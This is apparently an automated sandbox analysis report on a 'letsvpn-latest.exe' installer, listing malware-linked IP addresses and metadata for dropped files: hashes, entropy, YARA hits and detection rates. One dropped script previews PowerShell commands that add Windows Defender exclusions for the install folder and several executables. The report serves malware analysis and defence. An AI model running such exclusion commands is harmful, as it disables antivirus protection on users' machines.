                                                                                                                                                                                                  BAIDUBeijingBaiduNetcomScienceandTechnologyCoLtddb0fa4b8db0333367e9bda3ab68b8042.m68k.elfGet hashmaliciousMirai, GafgytBrowse
                                                                                                                                                                                                  • 106.13.224.246
                                                                                                                                                                                                  arm.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                                                                                                                                  • 119.75.215.154
                                                                                                                                                                                                  nsharm7.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                  • 182.61.224.140
                                                                                                                                                                                                  3.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                  • 182.61.224.138
                                                                                                                                                                                                  Instruction_695-18112-002_Rev.PDF.lnk (2).d.lnkGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                  • 103.235.47.188
                                                                                                                                                                                                  elitebotnet.sh4.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                                                                                                                                  • 180.76.189.193
                                                                                                                                                                                                  2024-12-10#U67e5#U9605_uninst.exeGet hashmaliciousValleyRATBrowse
                                                                                                                                                                                                  • 103.235.47.188
                                                                                                                                                                                                  2024-12-10#U67e5#U9605_uninst.exeGet hashmaliciousValleyRATBrowse
                                                                                                                                                                                                  • 103.235.47.188
                                                                                                                                                                                                  hax.mpsl.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                  • 182.61.224.158
                                                                                                                                                                                                  Fantazy.arm7.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                  • 180.76.229.255
                                                                                                                                                                                                  MICROSOFT-CORP-MSN-AS-BLOCKUSsparc.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                  • 52.150.237.12
                                                                                                                                                                                                  mipsel.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                  • 52.150.237.12
                                                                                                                                                                                                  sh4.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                  • 52.150.237.12
                                                                                                                                                                                                  arm7.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                  • 52.150.237.12
                                                                                                                                                                                                  mips.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                  • 52.150.237.12
                                                                                                                                                                                                  arm5.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                  • 52.150.237.12
                                                                                                                                                                                                  arm.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                  • 52.150.237.12
                                                                                                                                                                                                  x86_64.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                  • 52.150.237.12
                                                                                                                                                                                                  Tool_Unlock_v1.2.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                  • 204.79.197.219
                                                                                                                                                                                                  db0fa4b8db0333367e9bda3ab68b8042.m68k.elfGet hashmaliciousMirai, GafgytBrowse
                                                                                                                                                                                                  • 40.108.137.192
                                                                                                                                                                                                  No context
                                                                                                                                                                                                  No context
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):318
                                                                                                                                                                                                  Entropy (8bit):4.740682303463164
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:6:IPeGgdEYC5BeGgdEEFmJovkBPeGgdEEFrGvkBPeGgdEEFwn0ZkBPeGgdEEFQr4MF:ISuFAuEcJxSuEJGQSuEyPSuESr1SuE6
                                                                                                                                                                                                  MD5:B34636A4E04DE02D079BA7325E7565F0
                                                                                                                                                                                                  SHA1:F32C1211EAC22409BB195415CB5A8063431F75CD
                                                                                                                                                                                                  SHA-256:A9901397D39C0FC74ADFDB95DD5F95C3A14DEF3F9D58EF44AB45FC74A56D46DF
                                                                                                                                                                                                  SHA-512:6EB3255E3C89E2894F0085095FB5F6AB97349F0ED63C267820C82916F43A0AC014A94F98C186FF5D54806469A00C3C700A34D26DE90AFB090B80AC824A05AA2F
                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                  Preview:Add-MpPreference -ExclusionPath "C:\Program Files (x86)\letsvpn"..Add-MpPreference -ExclusionProcess "LetsPRO.exe"..Add-MpPreference -ExclusionProcess "tapinstall.exe"..Add-MpPreference -ExclusionProcess "uninst.exe"..Add-MpPreference -ExclusionProcess "Update.exe"..Add-MpPreference -ExclusionProcess "ndp462-web.exe"
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):247840
                                                                                                                                                                                                  Entropy (8bit):6.8984241672651985
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:6144:jZzvhs2Z4n1E7g34XtVYAOfTd/z44JsQw4UsrV:jJ+2Z4nShVY5JUCUu
                                                                                                                                                                                                  MD5:3530CB1B45FF13BA4456E4FFBCAE6379
                                                                                                                                                                                                  SHA1:5BE7B8E19418212A5A93E900C12830FACFD6BA54
                                                                                                                                                                                                  SHA-256:E0669B6312BAAEF6A3C86F3142B333EAB48494511405398BB09CC464881A43C9
                                                                                                                                                                                                  SHA-512:23BAAE23815FC946203BE6D93CEF84FF23FDE8ED88017179C65B7DE1F3B6114BC8343C277B8AE5A1D85AA59F25B5F146C1D827B7E4617BFD0AA0FF20359F49B5
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):1911328
                                                                                                                                                                                                  Entropy (8bit):5.911432104400453
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:24576:IWltPuAnUCiag6CKM2zCy9sQuOjj1VgZej6GeS4lNrCze5qhYp4t9m2T:Vt3UCiag6CKM2zCyZuOjJaxSS5qhr
                                                                                                                                                                                                  MD5:FE1E856A9B3491135C7D0FFF820F7025
                                                                                                                                                                                                  SHA1:3DAEBB0C6DCE636D9E4309568AE1882CB30D4A7C
                                                                                                                                                                                                  SHA-256:ED1CF65B74438AD7AFACE47E0A613228C1E5C44C29B556D18AC797FBE7F2D7B7
                                                                                                                                                                                                  SHA-512:8D43C859414394945443224CCEB39241DD287786903290D3F774306734CACA44E8E50CC8258764DFF3C194BA95EBA2A35A230427CA26AF04A882356868D32996
                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                  Yara Hits:
                                                                                                                                                                                                  • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Program Files (x86)\letsvpn\Update.exe, Author: Joe Security
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Process:C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exe
                                                                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):33
                                                                                                                                                                                                  Entropy (8bit):4.040775468486825
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:3:Gkg2day58L:GL2db8L
                                                                                                                                                                                                  MD5:862D9ED729F9BD1209A13C49C8388CFC
                                                                                                                                                                                                  SHA1:18C5C6FAAEC66D790893DD34D6A415879E36E92C
                                                                                                                                                                                                  SHA-256:A21ED21B8C02AD37840FB4374873858F650A7EBE9C29789D2562B51F30C2922B
                                                                                                                                                                                                  SHA-512:33C78DE82C4B449B59BEBA7BC7F700F5A9E271007B7D79A95C99F994CC15C151FD25471DD8682BEB06C55D4BB282E7890282947C8CD16419311E911900005FE5
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:LetsPRO.exe Started Successfully.
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):113696
                                                                                                                                                                                                  Entropy (8bit):6.322809804830913
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:1536:HARI0MvSAA6U7ks4jhOWE8i6wrNMRjYAZlfNASZfSOi3d3qKbE/mf:HWMpA6Agg8ahQYAZlFnUdXE/w
                                                                                                                                                                                                  MD5:C5485166B86B4CD6DE97C4DC8D0FBEFB
                                                                                                                                                                                                  SHA1:C047F339399098E7E4BF92EF7A8F38C1E5D5054D
                                                                                                                                                                                                  SHA-256:21678620BF5E7B4C8481270594B0A36615BE6152CA7A9396487364712236A3D5
                                                                                                                                                                                                  SHA-512:33EFDA5903587D17A698BFAEC6E5C119D4ADCFC23EA1588F2B155FFCBA88761E40E1DB791F545A064EFFDC63E6BA7AA68027C96B4A632331C0EA7297AC093F26
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):17440
                                                                                                                                                                                                  Entropy (8bit):6.988106171788286
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:Ou/ZC45lIZhqWOHlLf2KQcvBZ96DJS+ShjmM6IGBkS6mSvh:R/Z/lkq3b2KZBZMdS+ST6nkH
                                                                                                                                                                                                  MD5:EEF5553A62C9421A730CAE5A74B196B4
                                                                                                                                                                                                  SHA1:829F4010C8B325EEA88568F751D94E9ADB760679
                                                                                                                                                                                                  SHA-256:53E1E7F75B35BA11DD781E747BA6190B010EB104BCCCC695A19D0F60C4F88468
                                                                                                                                                                                                  SHA-512:CC6484D1042A688D9380899DF46D7EABC524E1DB41978CE7F5F60CEF66E9DD0B6D00909AC3DEF47D2DF90E194D779BD278B4A18F9A6857A5A5876FB8957121FD
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):16928
                                                                                                                                                                                                  Entropy (8bit):7.012730771621166
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:24TduWhqWOHlLf2KQcvBZ9SaqS+ShjmM6IGBkSm:Jdnq3b2KZBZbqS+ST6nkd
                                                                                                                                                                                                  MD5:839E774D3E0B80A9C407A1269D66D11A
                                                                                                                                                                                                  SHA1:76578166AAFDA33F896F195C890E6A36D9EECF42
                                                                                                                                                                                                  SHA-256:ABB8794A52C85A16A4CAD28C99FEA73AE4730ED7B2F708EF58894CC1791217C9
                                                                                                                                                                                                  SHA-512:37199AC53A2F137C529373FDBC9DDCB1A64DA78BE0E37EF15B2AF31276C115BEA04E0BF557F8124687AF20357A5DD1F2D5BD0B8C2483E2B389EEDE1295C148FD
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):16416
                                                                                                                                                                                                  Entropy (8bit):6.978847822864083
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:DYMXhqWOHlLf2KQcvBZ9M+AS+ShjmM6IGBkSZ:Dxq3b2KZBZnAS+ST6nki
                                                                                                                                                                                                  MD5:B6634DCB0B38617B4345A4346DA620C7
                                                                                                                                                                                                  SHA1:D7F8903AF96F76B09189BB01B641A19B147138C8
                                                                                                                                                                                                  SHA-256:8A397246E984B4FD51A15C5E71BD217A92061F9AEC3CB6CFCB938834E9DD4B65
                                                                                                                                                                                                  SHA-512:ECD24F51763627E1CC90D0AA1491B5352B3222F744647821DBD8B18C080863A12FEB8FD79B1A4BEC733404D095FA37821280339C94C08CFEB142F632FA2CEC23
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):221216
                                                                                                                                                                                                  Entropy (8bit):7.175286065819943
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:6144:qRP7/P97ilHDqO01ktQOzB4YjDnX08RYA3fP5SQm4:qRPpilHD+kQA4uk8RYA3f9
                                                                                                                                                                                                  MD5:C855A1C05CCD6547B4FF0CCA4D872D13
                                                                                                                                                                                                  SHA1:07D5A6BA39B36629AE598AC09FCF54B8A3FB5173
                                                                                                                                                                                                  SHA-256:F53A3E13BE932261994E12A14BC9607B32CB2FE39C31027A1CEFCA4B90CDC4A5
                                                                                                                                                                                                  SHA-512:33C0E60A9A212133F98B6D93409CF9FEDC4CBE537B2E01A35DCE5350DB565A13962B8B2281DE1926E93870414F1EC507666A435716BB1CFE777D6481CFF1ED71
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):56864
                                                                                                                                                                                                  Entropy (8bit):6.227644515850694
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:768:XfgAOG37OIh4Pqr8OvsQu4wwC9ZBMSq3b2KZBZpS+ST6nkYEIU:Xfgng6Ie1OvI4wwC9893qKj/mSU
                                                                                                                                                                                                  MD5:AAA8B3FA658B9620A798082968201334
                                                                                                                                                                                                  SHA1:660063E688A9C84F87B9F2C9F8FB11D5952139B9
                                                                                                                                                                                                  SHA-256:891C29FCB32C28C74E050BFD7D31D0C4C5FB2ABC5B877A542E25CB7DAA530189
                                                                                                                                                                                                  SHA-512:8AABA264914450716292D53AE86D631C37B3952304E51217CEC4BD83FE2BF958EF84D6C687D4D05A6D0FA52039A4856B393271C1E69D14A2454C1FAAB13F96AC
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):629280
                                                                                                                                                                                                  Entropy (8bit):6.141793124988224
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:6144:ZTTh6UXqQ0l0l2b4GQnn9lXNbOpIeQjDfjJcxm04FSh+0Nsj8X+iKbH2Yjot8J:HaQ0SnPNb8IbJImZo4LF
                                                                                                                                                                                                  MD5:7A9664E3077147897846682A2541F393
                                                                                                                                                                                                  SHA1:5BF7093E86D48AF5BEDB93AEA5F7415EB8DDB5D8
                                                                                                                                                                                                  SHA-256:23D5B87425994CBC03DAB7F9C30A70FB0DF0264FE15243DF4B9F9A7731D87ADB
                                                                                                                                                                                                  SHA-512:ED8C0F8F00E750E04857B3650546FEB1CEC80196D8EE4FEB5F7BB7A5C2A5CAAB7B379E963A3FE10847C5305C488D5FDC926F00952BD22E990CF11088BDEB3183
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):7918112
                                                                                                                                                                                                  Entropy (8bit):6.369226842144576
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:98304:z1qq//2Zh39WUIKFE6gffcae/7ky9I83W2A:ZqrIKaf0L7kyS83W2A
                                                                                                                                                                                                  MD5:1135A24F997D3C473BFD8105223B93F3
                                                                                                                                                                                                  SHA1:EA5DB547FA0CBA6DBC588D975E73677F4CA8AC29
                                                                                                                                                                                                  SHA-256:0A6F43AFEC08D3BD41DA246A0AE22EFC4FB48C1788AA7890BCAC68CC22D0F780
                                                                                                                                                                                                  SHA-512:49B9CDD70FB84E55AC70872DDD49AAB40DD5438BDF6F39378C63BE6977D7F3C33B16C10505054050ED52FAE65B8FC755AB6901E6144813235DEEA894A81D0D40
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 3%
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):124392
                                                                                                                                                                                                  Entropy (8bit):5.750227631115462
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:1536:G803aH5iTX9ctYESyMlOs4u3yUyJCbtAYD7IPLdM1O3qKe/mU:X/wz9cyyM7kwwGOi/n
                                                                                                                                                                                                  MD5:764EF886ADF57B8C7233556114030BCB
                                                                                                                                                                                                  SHA1:F4FE2F5C57B27A1A23D286E18533E47466F18059
                                                                                                                                                                                                  SHA-256:26F5D45D9E94A2800B9752AD0D9FD83F97569E611A9ED45DCC36C0716F6A84CD
                                                                                                                                                                                                  SHA-512:DF19D04B1A2FD65098F99C64877301D76898724A5692F0166C0AC0E211C4F0395FD0DCDB7367F51096180D6BBE325AF30763902C992383BF090B9E9C3D8C7458
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 3%
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):1588256
                                                                                                                                                                                                  Entropy (8bit):6.9087996682239625
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:24576:omFBUz/C41ab246LQ1+wa/AjHvKUY6qHpJ:DQCyab2o+wukvbf2
                                                                                                                                                                                                  MD5:56162A01D3DE7CB90EB9A2222C6B8F24
                                                                                                                                                                                                  SHA1:C4C10199B5F7D50D641D115F9D049832EC836785
                                                                                                                                                                                                  SHA-256:A41077ED210D8D454D627D15663B7523C33E6F7386CD920A56FBCFBB0A37547D
                                                                                                                                                                                                  SHA-512:23C4AAC046FFDECAA64ACBEE9579634C419202BE43463927DFABF9798DED17B1B7A1199F1DB54E247D28D82F39F3F352AC3ACBADE2118C67717FD37260BD8B4F
                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 3%
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:XML 1.0 document, ASCII text, with very long lines (5130)
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):27026
                                                                                                                                                                                                  Entropy (8bit):5.4569968058295055
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:192:xBrbCvYVVQRlc1zeeSgDNZ7UcpE69SZDhH1tW2:xnVSe3v7B79SZDhH1tW2
                                                                                                                                                                                                  MD5:11752AA56F176FBBBF36420EC8DB613A
                                                                                                                                                                                                  SHA1:0AFFC2837CEE71750450911D11968E0692947F13
                                                                                                                                                                                                  SHA-256:D66328EB01118A727E919B52318562094F2FF593BD33E5D3AAB5E73602388DFA
                                                                                                                                                                                                  SHA-512:ED78045E4B6B85A1A0557C2CCD85A27E90DEFC48E50D2833D3D8D23526DC8D1040A64E883CB42AEA3052D499EA4C95E775384AE710B1222191EAD6F8B0E0B560
                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                  Preview:<?xml version="1.0" encoding="utf-8"?>.<configuration>. <configSections>. <section name="EnvConfig" type="System.Configuration.NameValueSectionHandler"/>. </configSections>. <startup>. <supportedRuntime version="v4.0" sku=".NETFramework,Version=v4.6.2"/>. </startup>. <EnvConfig>. <add key="data" value="
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):23072
                                                                                                                                                                                                  Entropy (8bit):6.539242531365027
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:e8KcT7wZJt+/AeHVSh1hqWOHlLf2KQcvBZ9ymGS+ShjmM6IGBkSL6B:NT7wZL+4a07q3b2KZBZhGS+ST6nkB
                                                                                                                                                                                                  MD5:4FB031CB8840EE01CB6AA90696557143
                                                                                                                                                                                                  SHA1:B009C8C975929B73DD977969E6816066D57F39C6
                                                                                                                                                                                                  SHA-256:64B09932EF5B25F5C2C185FE955C7784AB23CDF7D12FDAD77FE05947E20006BA
                                                                                                                                                                                                  SHA-512:03731C0F6423F2FA3D6710B86C7CC41AA970058B818AB724321040984841DC451109638C813D564CB89DD00AF3962E84811AED5A3B37AE9A1B9C1FEBEB85AE60
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):31264
                                                                                                                                                                                                  Entropy (8bit):6.461508448145288
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:768:43kT+4YzHC2I3fpmoq3b2KZBZUS+ST6nkc:p+tHCHv4L3qKW/mm
                                                                                                                                                                                                  MD5:59D3183B3719B7F94E21F783594C63E9
                                                                                                                                                                                                  SHA1:ECA6B8C4211A09338EDE54E72D0729D7288F304F
                                                                                                                                                                                                  SHA-256:5A23DFB54F4AAFB8409687ED44A3AFF776BBDCE5008133D05C2F9A6F4E8F9466
                                                                                                                                                                                                  SHA-512:14F61E069A0CC203357AC7ABF9DFA4B1CD688C9B02020577669CEA3085704C90D58F09179155DA175C00D03D5700144A84524018CED00A6DDDA01F912E182242
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Process:C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exe
                                                                                                                                                                                                  File Type:ASCII text, with very long lines (8772)
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):135364
                                                                                                                                                                                                  Entropy (8bit):6.016485795542628
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:3072:zLoQRiLgADvJ1ID1LCk2CZhIfXWF4DAVCVQRS2/FY1URSvGZPv:vJRKgADvJggqhYdDrCRSU/
                                                                                                                                                                                                  MD5:C0681AE174E10CE9DCD451857287C82C
                                                                                                                                                                                                  SHA1:E99623C5E3B393BBD644624BDD2D30526DE79234
                                                                                                                                                                                                  SHA-256:A2D00997D0DC742D3E4CB4B2E84B8D9036DD9284F62D00C49604863D4704669F
                                                                                                                                                                                                  SHA-512:42A076D15F39D895075819FBCB58DED948029FE98BC21D313ED4130D38A5387EE41B3F335A9CB73C802703749B11E2041F5F77AE1F19AB05CF99F504D62D2167
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):123424
                                                                                                                                                                                                  Entropy (8bit):6.268913876963886
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:1536:00OQlavbPZKNK9hhmPZEMn5xGFE45N+cX8fZzd97WWhT5wNSAQr7YTFoVaoOT8TQ:0b5vb/lmhMNGzWWhTdTK5N8Kg/I
                                                                                                                                                                                                  MD5:804EFCB7A1A2442810E3D05FDE0519DD
                                                                                                                                                                                                  SHA1:6FD55EC5795CEE7819B33EB2B86A99A2D2677D90
                                                                                                                                                                                                  SHA-256:181BB25BA4F3AF4BF678F6DA27C8B6AC6290308C144D5607B4978A6502B1C151
                                                                                                                                                                                                  SHA-512:8350BC4FD80527BA8C8FB12D5ECCCF62BF099DA06016EDEFA56FA0F24FC1EF387220DB1A9B434BE5136360599BC09F8AD92639122D5447143B55330B6ECC1D63
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):25120
                                                                                                                                                                                                  Entropy (8bit):6.665914468487181
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:768:AH9oR6XScb7Fj7t6Yq3b2KZBZVzS+ST6nkc:Ay6XScbJj7t6b3qKj/mC
                                                                                                                                                                                                  MD5:E5D273B75C14961ED64B6D6A847C5AE2
                                                                                                                                                                                                  SHA1:72BFFAE47ED211EFABE455448C821E696BA9075C
                                                                                                                                                                                                  SHA-256:8C7BD931B6535B314BD6DE57ED60B36529348FDFAC50F50055818E042FF8CF8D
                                                                                                                                                                                                  SHA-512:87B66800D0A7CBD58DC87DA33639BC844D937E32B441665966965CF39F9733B400786846581FACCCFE87EF86C1DD855940425FF449A53AD9955765626A38E807
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):53792
                                                                                                                                                                                                  Entropy (8bit):6.30664826170408
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:768:9qr8YZ2IPJ1hCmfPzcscksOOWwp/fFCHUHGoH0w8eKYIySh6TOq3b2KZBZHPS+S/:93aJBOkAHaUm08eKYIITB3qKl/mZ1
                                                                                                                                                                                                  MD5:80C2EAC1F7420578A13331614291866A
                                                                                                                                                                                                  SHA1:759C0EF56DB6F407E5796CE6DEE2D8D19EF367F3
                                                                                                                                                                                                  SHA-256:30B86B4326E0C77AB66392BEEA678934BD396D37CEE4C35C358783EA1CD4828B
                                                                                                                                                                                                  SHA-512:A1D118E3B1C6B522FB54ACEE5CC2B48F15044C622A285025D1478A2988B939284E274323E802A1B068B5610A010BF87E6F430689FD7987CE4A8B24D0FAF2E957
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):143904
                                                                                                                                                                                                  Entropy (8bit):6.0435655988094465
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:3072:YXiDdWM0c7K9ES99d3+uVIQNlHK6Uav1vP8F6D0/5:zdWM0cW9EONvHKwvP8FWw
                                                                                                                                                                                                  MD5:BFFA4E71462CA66C7D8D918C90A341E9
                                                                                                                                                                                                  SHA1:20CA82B113D96225E34720B838AEEBE8F9B2980A
                                                                                                                                                                                                  SHA-256:9BBCCFE3E720F2B6ECB1EAD65C7AA95808DB459F6948B3D68328673D52C4A5B8
                                                                                                                                                                                                  SHA-512:4546BF89CB11FAA9E888DCDA503904EE4E50BF81A9C23BACF7C6F4146F035F97C37D351A7E6DBD040342C4751B8757CFD53B1C66696F2AE58594636DE6FD78BD
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
